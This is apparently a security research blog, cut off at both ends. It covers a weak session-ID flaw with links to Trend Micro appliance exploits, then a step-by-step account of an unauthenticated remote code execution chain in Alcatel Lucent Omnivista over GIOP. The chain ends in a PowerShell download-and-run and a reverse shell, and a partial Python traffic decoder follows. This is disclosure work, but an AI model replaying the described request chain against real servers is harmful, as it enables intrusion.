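 * Returns 0 on success, -1 if the random source cannot be read.
 */
int strong_session_id(char out[SESSION_ID_LEN + 1])
{
    unsigned char raw[SESSION_ID_LEN / 2];
    FILE *f = fopen("/dev/urandom", "rb");
    if (f == NULL)
        return -1;
    size_t got = fread(raw, 1, sizeof raw, f);
    fclose(f);
    if (got != sizeof raw)
        return -1;
    for (size_t i = 0; i < sizeof raw; i++)
        snprintf(out + i * 2, 3, "%02x", (unsigned int)raw[i]);
    return 0;
}

int main(void)
{
    /* Constructed scenario: two users log in within the same second,
     * reproducing the observation that opened the analysis above. */
    time_t now = time(NULL);
    char first[SESSION_ID_LEN + 1], second[SESSION_ID_LEN + 1];

    weak_session_id(now, first);
    weak_session_id(now, second);
    printf("weak   #1: %s\n", first);
    printf("weak   #2: %s  (%s)\n", second,
           strcmp(first, second) == 0 ? "identical: shared session" : "different");

    if (strong_session_id(first) == 0 && strong_session_id(second) == 0) {
        printf("strong #1: %s\n", first);
        printf("strong #2: %s\n", second);
    }
    return 0;
}
```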
<br />
However, there are two conditions which affect exploitation of this vulnerability:<br />
<br />
1) A legitimate user has to be authenticated - a session token is associated with an IP address when a user logs in<br />
2) The attacker needs to perform the attack from the same IP address as the legitimate user<br />
<br />
The second condition is not an issue in a NATed environment, but in a different environment it is definitely the most significant constraint.<br />
<br />
A further conclusion is that although the attacker is technically able to predict "future" session_id tokens, there is no point in doing so, since condition (1) has to be met first and an association between an IP address and a session_id has to exist in the database.<br />
<br />
The exploit Proof-of-Concept (PoC) has been published <a href="https://gist.github.com/malerisch/0b8ecfcb03a2c2f26e5f649cf1df8d33">here</a>, and below is a video showing the attack in action:<br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen="" class="YOUTUBE-iframe-video" data-thumbnail-src="https://i.ytimg.com/vi/rwmfbvvGHDw/0.jpg" frameborder="0" height="266" src="https://www.youtube.com/embed/rwmfbvvGHDw?feature=player_embedded" width="320"></iframe></div>
<br />
<div class="" style="clear: both; text-align: center;">
<br /></div>
The exploits for all the other TDA vulnerabilities that were discovered as part of this research can be found below:<br />
<br />
<a href="https://gist.github.com/malerisch/0b8ecfcb03a2c2f26e5f649cf1df8d33">CVE-2016-8584 - Trend Micro Threat Discovery Appliance <= 2.6.1062r1 (latest) Session Generation Authentication Bypass Vulnerability</a><br />
<br />
<a href="https://gist.github.com/malerisch/b8764501d299f2ec9eb145258d404e5f">CVE-2016-7547 - Trend Micro Threat Discovery Appliance <= 2.6.1062r1 dlp_policy_upload.cgi Information Disclosure Vulnerability</a><br />
<br />
<a href="https://gist.github.com/malerisch/5de8b408443ee9253b3954a62a8d97b4">CVE-2016-7552 - Trend Micro Threat Discovery Appliance <= 2.6.1062r1 logoff.cgi Directory Traversal Authentication Bypass Vulnerability</a><br />
<br />
<a href="https://gist.github.com/malerisch/91239147d4fceffa63006974889ef1af">CVE-2016-8585 - Trend Micro Threat Discovery Appliance <= 2.6.1062r1 admin_sys_time.cgi Command Injection Remote Code Execution Vulnerability</a><br />
<br />
<a href="https://gist.github.com/malerisch/97c160aa4e8219c7c9ad25107444a280">CVE-2016-8586 - Trend Micro Threat Discovery Appliance <= 2.6.1062r1 detected_potential_files.cgi Command Injection Remote Code Execution Vulnerability</a><br />
<br />
<a href="https://gist.github.com/malerisch/aac1ad3e6f3bfd70b35ba6538ecbff23">CVE-2016-8587 - Trend Micro Threat Discovery Appliance <= 2.6.1062r1 dlp_policy_upload.cgi Remote Code Execution Vulnerability</a><br />
<br />
<a href="https://gist.github.com/malerisch/93be2141dfc5709159468762937f2853">CVE-2016-8588 - Trend Micro Threat Discovery Appliance <= 2.6.1062r1 hotfix_upload.cgi Command Injection Remote Code Execution Vulnerability</a><br />
<br />
<a href="https://gist.github.com/malerisch/3bbb6d0b235fa5af2ba6f05826fe3846">CVE-2016-8589 - Trend Micro Threat Discovery Appliance <= 2.6.1062r1 log_query_dae.cgi Command Injection Remote Code Execution Vulnerability</a><br />
<br />
<a href="https://gist.github.com/malerisch/7b84a4bd6eee0a3a591677f421653a2e">CVE-2016-8590 - Trend Micro Threat Discovery Appliance <= 2.6.1062r1 log_query_dlp.cgi Command Injection Remote Code Execution Vulnerability</a><br />
<br />
<a href="https://gist.github.com/malerisch/5dd838a723b342bb04121f29a8333e00">CVE-2016-8591 - Trend Micro Threat Discovery Appliance <= 2.6.1062r1 (latest) log_query.cgi Command Injection Remote Code Execution Vulnerability</a><br />
<br />
<a href="https://gist.github.com/malerisch/0c78e49124561524fd59d6635007eefd">CVE-2016-8592 - Trend Micro Threat Discovery Appliance <= 2.6.1062r1 (latest) log_query_system.cgi Command Injection Remote Code Execution Vulnerability</a><br />
<br />
<a href="https://gist.github.com/malerisch/c59ab650c8e226ef22cdfbfeeee6d4ec">CVE-2016-8593 - Trend Micro Threat Discovery Appliance <= 2.6.1062r1 (latest) upload.cgi Remote Code Execution Vulnerability</a><br />
<br />
A Metasploit module has been developed and added to the master branch:<br />
<br />
<a href="https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/trendmicro_threat_discovery_admin_sys_time_cmdi.rb">https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/trendmicro_threat_discovery_admin_sys_time_cmdi.rb</a><br />
<br />
Roberto Suggi Liverani, 2016-12-01<br />
<b>Alcatel Lucent Omnivista or: How I learned GIOP and gained Unauthenticated Remote Code Execution (CVE-2016-9796)</b><br />
<br />
It is time for another advisory, or rather a blog post, about <a href="http://enterprise.alcatel-lucent.com/?product=Omnivista8770NetworkManagementsystem&page=overview">Alcatel Lucent Omnivista</a> and its vulnerabilities. Omnivista is a central network management tool, typically used in medium/large organisations with a complex VoIP/SIP infrastructure.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjNwcgRWZsbMobKG0FR4JForFOKWAtnt4-2I4fTOBAQuE7qTImBJeg9kw5OIcZtyTU5z-ApH9-lHx2r9qXwxRTJ7pfWmgqai4BUm2gZNG0aK0Ojbswy8D2btO-qqjYOckLgV-gabH9wFL0/s1600/twitter-pic2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="379" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjNwcgRWZsbMobKG0FR4JForFOKWAtnt4-2I4fTOBAQuE7qTImBJeg9kw5OIcZtyTU5z-ApH9-lHx2r9qXwxRTJ7pfWmgqai4BUm2gZNG0aK0Ojbswy8D2btO-qqjYOckLgV-gabH9wFL0/s640/twitter-pic2.png" width="640" /></a></div>
<br />
<br />
Interestingly enough, this software belongs to the niche of "undownloadable" software, and it requires a license to work as well. My "luck" came during an engagement where it was already installed, and this post documents one of the many 0days discovered during that audit.<br />
<br />
There are several reasons why I wanted to dedicate a whole blog post to this vulnerability.<br />
<br />
First, remote code execution (RCE) is always a sweet bug to show. Second, I strongly believe that documenting vulnerabilities in applications using old protocols and standards, namely GIOP and CORBA, can be beneficial for the infosec community, since not many examples of vulnerabilities in such applications are available or published on the Internet.<br />
<br />
In fact, I would like to be proven wrong in stating that this is probably the only blog post documenting an exploit against a CORBA/GIOP based application. I will leave it to my readers to prove me wrong...<br />
<br />
However, this does not mean that such technologies are no longer in use. Consider that Java includes CORBA support in its standard library (see <a href="https://docs.oracle.com/javase/7/docs/api/org/omg/CORBA/ORB.html">class ORB</a>). Also, a lot of critical and often "legacy" applications and systems do make use of such technologies, so I assume it is important to understand them and look for an exploitation angle. Hopefully, this will inspire other people to share their similar attacks or exploits.<br />
<br />
In a Twitter survey that I ran some time ago, I was also curious to see how many people are familiar with such technologies; even though the survey sample is limited, the statistics are clear:<br />
<blockquote class="twitter-tweet" data-lang="en">
<div dir="ltr" lang="en">
For stats for my next blog post - have you ever tested or worked with Corba/Giop based software?</div>
— Roberto Suggi (@malerisch) <a href="https://twitter.com/malerisch/status/754616407342678016">July 17, 2016</a></blockquote>
So, enough with the introduction; let's now dive into the vulnerability. For those of you who want to skip the theory, just jump to the video and PoC exploit sections at the bottom of this blog post. As usual, comments and feedback are more than welcome. Enjoy, and if you like this blog post, re-tweet it!<br />
<br />
<b>So what is CORBA and GIOP?</b><br />
<br />
OMG (Object Management Group) designed the CORBA (Common Object Request Broker Architecture) standard to allow interoperability between different hardware and software. The Omnivista product takes advantage of such a design to ensure its "universal" compatibility as a central network management solution. The CORBA architecture is similar to the remote procedure call architecture from the eighties, with the addition of ORBs (Object Request Brokers).<br />
<br />
For those of you unfamiliar with this technology and terminology, just imagine a client/server model with exposed objects that can be invoked from different machines.<br />
<br />
To better explain, here is a simple high-level diagram which shows a CORBA architecture:<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEha5yNi8Dd14IY4Zej13EMQUbmY7aFRBIsvA5ATccS1LtmicH2usy7ZSbf0K7pH13kzd0_vJgL8VEq8fOa7Jb5u9Uxm3j7CN-HX_XsCvLehyphenhyphenCOvwSyeoCfGukOlX9N5wDiHh5RTjgFVw-0/s1600/s1.png" imageanchor="1"><img border="0" height="163" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEha5yNi8Dd14IY4Zej13EMQUbmY7aFRBIsvA5ATccS1LtmicH2usy7ZSbf0K7pH13kzd0_vJgL8VEq8fOa7Jb5u9Uxm3j7CN-HX_XsCvLehyphenhyphenCOvwSyeoCfGukOlX9N5wDiHh5RTjgFVw-0/s640/s1.png" width="640" /></a><br />
<br />
An ORB is an abstraction that defines the mechanisms responsible for creating, sending and locating the object references used in remote calls. Behind an ORB there is more: an object is defined by its interfaces, written in IDL (Interface Definition Language). IDL is what makes CORBA programming-language independent; imagine a Java client that can invoke a remote object written in C++. These are the "flexibility" and neutrality features of CORBA. There are also other components, such as stubs and runtime code, which are not covered in this blog post (see the references at the bottom for more detailed information).<br />
<br />
Many implementations exist that support ORB architectures, such as <a href="http://omniorb.sourceforge.net/index.html">OmniORB</a>, which is used by the Omnivista solution.<br />
<br />
The client/server interaction for these object-oriented remote procedure calls is covered by GIOP and IIOP.<br />
<br />
GIOP (General Inter-ORB Protocol) is the general protocol that defines the network communication between a client and a server. GIOP is transport-layer independent and its level of abstraction is higher than IIOP. IIOP (Internet Inter-ORB Protocol) is a specialisation of GIOP which defines CORBA communication over the TCP/IP transport layer.<br />
<br />
To summarize again with a high-level diagram, this is what it looks like when a client and a server communicate (image courtesy of <a href="https://en.wikipedia.org/w/index.php?curid=18751499">User:Alksentrs</a>):<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://upload.wikimedia.org/wikipedia/en/thumb/f/f0/Orb.svg/401px-Orb.svg.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://upload.wikimedia.org/wikipedia/en/thumb/f/f0/Orb.svg/401px-Orb.svg.png" width="319" /></a></div>
<br />
Wireshark has a built-in dissector for GIOP packets and their structure. An example of a GIOP request packet exchanged between the Omnivista client ORB and the server's ORB is shown below. The highlighted elements are of interest for understanding how CORBA/GIOP works in this case.<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFOImoHlVv3tzez-dCAfgObKq92sJUMn6t-JmNzh-el65lB9Bp7G-0jKd0uMu_0bwRNGW9jdCzY3r19TMbFOhNNZzkzqmp9XNiCb18NBSifJHjcRORK-C9RcypoivG6QsatxwjDKiF5DU/s1600/s2.png" imageanchor="1"><img border="0" height="528" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFOImoHlVv3tzez-dCAfgObKq92sJUMn6t-JmNzh-el65lB9Bp7G-0jKd0uMu_0bwRNGW9jdCzY3r19TMbFOhNNZzkzqmp9XNiCb18NBSifJHjcRORK-C9RcypoivG6QsatxwjDKiF5DU/s640/s2.png" width="640" /></a><br />
<br />
TCP port 30024 is the port on which the ORB listens on the server side.<br />
<br />
The GIOP packet itself is made of different elements. We see a header which includes the message type (request) and the message size. Then comes the request part itself, which contains various elements, such as the object key length, the object key and the request operation. The stub data is empty in this case; it represents the request "body", that is, the parameters which might be included within the request.<br />
<br />
The object key is used by the ORB on the server side together with the request operation. The request operation is the IDL identifier naming, within the context of the target object's interface, the operation being invoked. Object key and request operation are passed to the server-side ORB, which hands the call and its arguments to the listening service.<br />
<br />
For a full technical specification of the GIOP protocol packet, which is beyond the scope of this blog post, the following <a href="http://www.omg.org/cgi-bin/doc?formal/2002-05-15.pdf">paper</a> is recommended.<br />
<br />
The Omnivista server makes use of multiple OmniORB ORBs listening on different ports. A full network scan of the Omnivista server shows multiple "omniORB and CORBA naming services". Below is the result of an nmap scan filtered on GIOP ports:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgo0rHvad1fClI20T2oZ8Ky8gS_BrDQcwsLd49bE6yqhckKEC76K1rq-UKcd0KqAxr4wC0OhnDIRcis4MQlN768coAGihB3T0ztnDGpWuaBJuBVWkZOvicvD4HcEH9x_qva4EQLIBnZx34/s1600/giop-services.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="537" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgo0rHvad1fClI20T2oZ8Ky8gS_BrDQcwsLd49bE6yqhckKEC76K1rq-UKcd0KqAxr4wC0OhnDIRcis4MQlN768coAGihB3T0ztnDGpWuaBJuBVWkZOvicvD4HcEH9x_qva4EQLIBnZx34/s640/giop-services.png" width="640" /></a></div>
<br />
<br />
<b>Where is the bug and how can it be exploited?</b><br />
<br />
The bug derives from the fact that certain ORBs are exposed and can be invoked without authentication. In addition, these ORBs give access to interfaces on the server which can be abused to achieve code execution. The attacker only needs to reproduce a sequence of requests/responses in order to abuse such ORBs and execute arbitrary code on the server.<br />
<br />
Let's see step by step where the vulnerability lies and how it was discovered. First, using the Omnivista client itself, I tried to understand how it works, what it allows a user to do and which features can be invoked.<br />
<br />
This is a screen shot of the GUI, after successful authentication:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmgiYhsIpcCBdW_CTOGWIkYRvh5ZsucaULDbMUTuA8xviEINVmg12BwF3K30ufaTKoduwAi8HMuu9UQx2irpvQ8msHgG8kjRjqgBgW3NF_fK2eCTDfgxON98h3sJQQ9OzXkIki17IT8qI/s1600/s3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="452" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmgiYhsIpcCBdW_CTOGWIkYRvh5ZsucaULDbMUTuA8xviEINVmg12BwF3K30ufaTKoduwAi8HMuu9UQx2irpvQ8msHgG8kjRjqgBgW3NF_fK2eCTDfgxON98h3sJQQ9OzXkIki17IT8qI/s640/s3.png" width="640" /></a></div>
<br />
Under the Setup tab, the scheduler component attracted my attention. I noticed that a user can create a job, add a task to it and reference an executable on the server's file system.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6yvCW-_1Ca9gIgZNxZMqgKroLIitUCME2VqKw5MopFJial8ieuGtqzC2a9bjiKq5N23M1jp8KoOBpd1kttOqCb3S4MFZe3RWeEgjVbx0wZ1YFma3HhvEeGCvDqcQXNcWvGqG6ZzVLEM8/s1600/s4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="436" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6yvCW-_1Ca9gIgZNxZMqgKroLIitUCME2VqKw5MopFJial8ieuGtqzC2a9bjiKq5N23M1jp8KoOBpd1kttOqCb3S4MFZe3RWeEgjVbx0wZ1YFma3HhvEeGCvDqcQXNcWvGqG6ZzVLEM8/s640/s4.png" width="640" /></a></div>
<br />
Once the task is added, the job can be executed, which launches the referenced executable. For instance, I created a job task which would execute "C:\windows\system32\cmd.exe" with the argument "/c notepad.exe".<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-sI20I4v2mhyr398KFyHohXD_IKkeBJe0nK8RfaAprGgmr7eK8J07vVrtxWcaIr0L9Zl240ioRqeqAbbRyLgA4Ojbl1avA0opYrfsnfVSIBg1dS0zUUsmZlkQjVTTbqq5on_a0R_0sEQ/s1600/scheduler_with_cmd.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="284" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-sI20I4v2mhyr398KFyHohXD_IKkeBJe0nK8RfaAprGgmr7eK8J07vVrtxWcaIr0L9Zl240ioRqeqAbbRyLgA4Ojbl1avA0opYrfsnfVSIBg1dS0zUUsmZlkQjVTTbqq5on_a0R_0sEQ/s640/scheduler_with_cmd.png" width="640" /></a></div>
<br />
<br />
Then I executed the job to see how the feature works.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhq5P6SQ7qMzAJsOJIGRoFqqJG0eNOzPthai1kfdaNTTPzzJVH4BpZkgf0-VnHCBumGEKemLZSWw-f-fR2Op1NKTPvmz81fNnbJxNVtX83dxppIPWZAZyOKvZpFwlsNpE2Tp1iN6rjAaqA/s1600/execute-job.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="502" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhq5P6SQ7qMzAJsOJIGRoFqqJG0eNOzPthai1kfdaNTTPzzJVH4BpZkgf0-VnHCBumGEKemLZSWw-f-fR2Op1NKTPvmz81fNnbJxNVtX83dxppIPWZAZyOKvZpFwlsNpE2Tp1iN6rjAaqA/s640/execute-job.png" width="640" /></a></div>
<br />
On the server, I observed that the task is indeed executed and notepad.exe is launched:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTqR8GZDNp4GGSHyZmZO7qQakmGQ_h7Pih0rWvxJgiVqln537ApEGseKIyUxLkWAaUe3u1mJnr7ukmoyp0wX6IEGl7RLdApZ1rON3lcVJf7SdB5YNY81YAzXSgBIbBAIBE47GXoV-4-oo/s1600/process-on-server.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="64" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTqR8GZDNp4GGSHyZmZO7qQakmGQ_h7Pih0rWvxJgiVqln537ApEGseKIyUxLkWAaUe3u1mJnr7ukmoyp0wX6IEGl7RLdApZ1rON3lcVJf7SdB5YNY81YAzXSgBIbBAIBE47GXoV-4-oo/s640/process-on-server.png" width="640" /></a></div>
<br />
<br />
For authenticated administrators these operations might be "acceptable", but what if an attacker is able to do the same from a remote position and without authentication?<br />
<br />
When facing unusual technologies, the best recommendation is to analyse the traffic between client and server while exercising all the functionality provided by the target software. In this case, the Omnivista client (a Java thick client) was connecting to certain ports using the GIOP protocol. By examining the packets, it is possible to understand which requests and responses occur between the client and the server.<br />
<br />
One of the major drawbacks in the way Omnivista has implemented CORBA/GIOP is that replay attacks are possible, due to the lack of a proper session mechanism, even though security and authentication have been implemented within the Omnivista product itself.<br />
<br />
My first attempt to prove this point was to replay a request/action that can only be performed after authentication. For instance, among the sniffed GIOP packets, I picked the "addJob" request to see whether replaying it from a different machine, with a different IP address and without authenticating, would lead to the same result/response.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTY3BD_KHdZ_4f9M4Pao_YZJXiTo5EtJgjQL1JNiSApkDM917r9Wwnu7wSblpdlTRrzbVGlY77mx8jBrx4DgKlekVifD_74TzqGVw8F6gLQwXK3CPMEiTC1-GGk0U-Rby44ZIoEoPVUH0/s1600/addjob.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="224" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTY3BD_KHdZ_4f9M4Pao_YZJXiTo5EtJgjQL1JNiSApkDM917r9Wwnu7wSblpdlTRrzbVGlY77mx8jBrx4DgKlekVifD_74TzqGVw8F6gLQwXK3CPMEiTC1-GGk0U-Rby44ZIoEoPVUH0/s640/addjob.png" width="640" /></a></div>
<br />
Analysing the packet first, I noticed that no session token, nonce or challenge seemed to be present in the payload, so I thought I was going in the right direction.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjntLUDql9JZ2BINinf0cruEqkyzv9W8ZD0Csi1BZpvw7_1OZOEyDkZLfpL4-jWZuFJfVWdWTFpEu6cGXu0THZ7_VMPED6FAIKY6T48id9bsycEh1SDyQrlevdh-nAH2pBV-NlWmjoXHpk/s1600/giop-body.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="314" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjntLUDql9JZ2BINinf0cruEqkyzv9W8ZD0Csi1BZpvw7_1OZOEyDkZLfpL4-jWZuFJfVWdWTFpEu6cGXu0THZ7_VMPED6FAIKY6T48id9bsycEh1SDyQrlevdh-nAH2pBV-NlWmjoXHpk/s640/giop-body.png" width="640" /></a></div>
<br />
I first removed the BBBBB task using a valid session, to make sure that my replay would re-create a task with the same name. I then extracted the packet, sent that single packet alone and got the same response from the server! I went back to the client, and the task was there again!<br />
<br />
That sounded extremely promising; now I had to understand the entire attack flow and prepare the exploit chain.<br />
<br />
<b>Exploit chain</b><br />
<br />
After analysing the entire sequence, the conclusion is that unauthenticated remote code execution is possible by chaining three different operations: AddJobSet, AddJob and ExecuteNow. These operations must be executed in sequence by sending valid GIOP packets to the OmniVista server on TCP port 30024.<br />
<br />
Let's now dive into each step:<br />
<br />
<i>1st step - AddJobSet</i><br />
<br />
First, the AddJobSet packet is sent (an example is shown below); this packet uses the SchedulerInterface to add a job set on the server.<br />
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9mUi5jGhuwWrrb0YDVAtt4LLDBAU9ZSCoRT8YRezjgUjcEN3fFMkTaBkZNh9hZtEbu0sxN1Qs4vS-Me1G213BAauT35KfQAKzmg3vY6NFud2OwZ8nW30rLLvsZe5M7wqtokgiHoIS0jk/s1600/addjobset.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9mUi5jGhuwWrrb0YDVAtt4LLDBAU9ZSCoRT8YRezjgUjcEN3fFMkTaBkZNh9hZtEbu0sxN1Qs4vS-Me1G213BAauT35KfQAKzmg3vY6NFud2OwZ8nW30rLLvsZe5M7wqtokgiHoIS0jk/s640/addjobset.png" width="640" /></a></div>
<br />
The SchedulerInterface is the object key of this action, and this can be seen in Wireshark too:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHAH0tpjsPlgsbA3H39NTs33nEikd_uoedxBkXaHR4g1ajMQh7YU9-oToisV4oBNoh0A7apDu5GrdIR-dLcL8BGjZfb3_gmhUzGICD4ZY_yI_FGFH3Thssdw5e0-RCxwgl37edpzSxIQY/s1600/objectkey-firstpacket.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHAH0tpjsPlgsbA3H39NTs33nEikd_uoedxBkXaHR4g1ajMQh7YU9-oToisV4oBNoh0A7apDu5GrdIR-dLcL8BGjZfb3_gmhUzGICD4ZY_yI_FGFH3Thssdw5e0-RCxwgl37edpzSxIQY/s1600/objectkey-firstpacket.png" /></a></div>
<br />
The response now contains an object key that has to be used in the following requests. In our case, the returned object key is: 00 00 00 00 36 32 81 55 F8 F4 08 00 61 00 00 00. We will see this object key used in the following steps of the attack flow.<br />
<br />
<i>2nd Step: AddJob packet</i><br />
<br />
This packet adds the specific job inside the job set test1, using the object key obtained in the reply to the AddJobSet request; the object key is highlighted in black in the screenshot below. Here a job named test2 is created, which calls the C:\Windows\System32\cmd.exe executable with an argument that invokes a PowerShell web script to download and execute a malicious script hosted on the attacker's server.<br />
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQkQkqiF-80PD-j1gY2SiX9Q2xjlH70F6svdJC31dd8dA0CyxLyT-8zYRmSm1QtNCXA-gKNJJbmvhIqLouwtGr2J90fdejBBmxzOt-Gw59XVY8jhoary0bEe-KekMVz-9pi4Ct6gW_5LY/s1600/addjob2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="358" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQkQkqiF-80PD-j1gY2SiX9Q2xjlH70F6svdJC31dd8dA0CyxLyT-8zYRmSm1QtNCXA-gKNJJbmvhIqLouwtGr2J90fdejBBmxzOt-Gw59XVY8jhoary0bEe-KekMVz-9pi4Ct6gW_5LY/s640/addjob2.png" width="640" /></a></div>
<div>
<i><br /></i></div>
<div>
<div>
<i>3rd step: ExecuteNow:</i></div>
<div>
<br /></div>
<div>
Once the test2 job is added, the ExecuteNow method can be invoked to execute the job immediately. Again, the same object key (highlighted in black) is used in this request as well:</div>
</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfYKwuBxuXqOsozFLnCtfmXzYF2tEf6NQ0PZTLO1P8M1Wor4u8Ei5WKt6QkI1BhGUDR1am8z-pfrTdQzL5Itmva98H6pBTEn_HCMdTPt5OdvX91MUSwqUYBl6qHGUWKdl4S89tPt8Schc/s1600/executenow.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="100" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfYKwuBxuXqOsozFLnCtfmXzYF2tEf6NQ0PZTLO1P8M1Wor4u8Ei5WKt6QkI1BhGUDR1am8z-pfrTdQzL5Itmva98H6pBTEn_HCMdTPt5OdvX91MUSwqUYBl6qHGUWKdl4S89tPt8Schc/s640/executenow.png" width="640" /></a></div>
<div>
<br /></div>
Below, the Omnivista server connects back to the attacker’s machine, concluding our exploit chain in a sweet Meterpreter shell:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjsHvldmwJ9rlhjBDED7PrpZrO1ObZhs7Ljyj4p9-WluMSCqqNlmQUelvt9-157okzxGI-kw_Ce1exbHoz4gEHnHxXSAT92LplENdBipTwXtn6BiPIhPmygpD8V1TP_4ZSkuvdYdKVXaWA/s1600/meterpreter-reverse.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="88" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjsHvldmwJ9rlhjBDED7PrpZrO1ObZhs7Ljyj4p9-WluMSCqqNlmQUelvt9-157okzxGI-kw_Ce1exbHoz4gEHnHxXSAT92LplENdBipTwXtn6BiPIhPmygpD8V1TP_4ZSkuvdYdKVXaWA/s640/meterpreter-reverse.png" width="640" /></a></div>
<br />
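As an added example, not the author's PoC or the vendor's code, here is a decoder for the GIOP request layout described in the CORBA/GIOP section above, applied to spot the AddJobSet/AddJob/ExecuteNow sequence just described in traffic captured on TCP port 30024. It assumes the on-wire spelling of the operation names, that the SchedulerInterface object key is the ASCII string shown in Wireshark, and constructed client addresses; every packet is built locally by the script.<br />
<br />
```python
import struct

# Added example, not the author's PoC: all traffic is constructed locally and the
# on-wire spelling of operation names and of the object key is assumed.
GIOP_REQUEST = 0   # message_type of a Request
KEY_ADDR = 0       # GIOP 1.2 TargetAddress discriminator: plain object key
SCHEDULER_OPS = ("addjobset", "addjob", "executenow")  # matched case-insensitively


class CDR:
    """Reader over one GIOP message; CDR alignment is relative to offset 0 of the message."""
    def __init__(self, data, little_endian):
        self.data, self.pos, self.fmt = data, 0, ("<" if little_endian else ">")
    def align(self, n):
        self.pos += (-self.pos) % n
    def raw(self, n):
        chunk = self.data[self.pos:self.pos + n]
        if len(chunk) != n: raise ValueError("truncated GIOP message")
        self.pos += n
        return bytes(chunk)
    def octet(self):
        return self.raw(1)[0]
    def ushort(self):
        self.align(2)
        return struct.unpack(self.fmt + "H", self.raw(2))[0]
    def ulong(self):
        self.align(4)
        return struct.unpack(self.fmt + "I", self.raw(4))[0]
    def octets(self):            # sequence<octet>: ulong length, then the bytes
        return self.raw(self.ulong())
    def string(self):            # CDR string: the length counts the NUL terminator
        body = self.raw(self.ulong())
        if not body or body[-1] != 0: raise ValueError("malformed CDR string")
        return body[:-1].decode("latin-1")
    def service_contexts(self):  # IOP::ServiceContextList: count, then (id, data) pairs
        return [(self.ulong(), self.octets()) for _ in range(self.ulong())]


def parse_request(msg):
    """Decode the 12-byte GIOP header and the RequestHeader of GIOP 1.0, 1.1 or 1.2."""
    if len(msg) < 12 or msg[:4] != b"GIOP":
        raise ValueError("not a GIOP message")
    minor, flags, mtype = msg[5], msg[6], msg[7]
    r = CDR(msg, little_endian=bool(flags & 1))  # 1.0: byte_order; 1.1+: flags bit 0
    r.pos = 8; size = r.ulong()                  # message_size excludes the header
    if mtype != GIOP_REQUEST or len(msg) < 12 + size:
        raise ValueError("not a complete GIOP Request")
    if minor <= 1:                      # RequestHeader_1_0 / RequestHeader_1_1
        ctx = r.service_contexts()
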